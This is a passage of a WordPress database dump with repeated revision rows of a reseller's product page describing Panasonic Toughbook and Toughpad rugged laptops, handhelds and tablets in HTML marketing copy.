<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:52:38','2018-12-21 01:52:38','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2690,1,'2018-12-21 09:53:23','2018-12-21 01:53:23','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:53:23','2018-12-21 01:53:23','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2691,1,'2018-12-21 09:55:24','2018-12-21 01:55:24','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, 